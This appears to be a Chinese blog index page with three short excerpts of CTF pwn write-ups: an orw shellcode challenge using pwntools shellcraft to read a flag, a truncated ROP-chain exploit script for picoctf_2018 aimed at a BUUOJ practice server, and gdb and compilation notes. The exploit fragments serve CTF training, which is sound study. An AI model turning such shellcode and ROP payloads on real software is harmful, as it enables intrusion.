摘要: 写shellcode,由于我还没开始写反汇编引擎,所以直接去百度了下 把提权函数给ban了,所以只能直接读取flag,看了下pwnki师傅的博客 学到了shellcraft的新花样,有意思 from pwn import * #p=process('./orw') p=remote('node3.b 阅读全文
posted @ 2021-01-13 22:40 PYozo_free 阅读(515) 评论(0) 推荐(0) 编辑
摘要: picoctf_2018_rop chain rop from pwn import * p=remote('node3.buuoj.cn',25933) p.recvuntil('input> ') payload=b'p'*0x18+b'pppp'+p32(0x80485CB)+p32(0x80 阅读全文
posted @ 2021-01-13 21:03 PYozo_free 阅读(109) 评论(0) 推荐(0) 编辑
摘要: https://www.jianshu.com/p/1a966b62b3d4 https://xuanxuanblingbling.github.io/ctf/tools/2020/03/20/gdb/ 或者这样编译 sudo gcc test.c -o test -Wl,-I /home/lukb 阅读全文
posted @ 2021-01-13 14:12 PYozo_free 阅读(211) 评论(0) 推荐(0) 编辑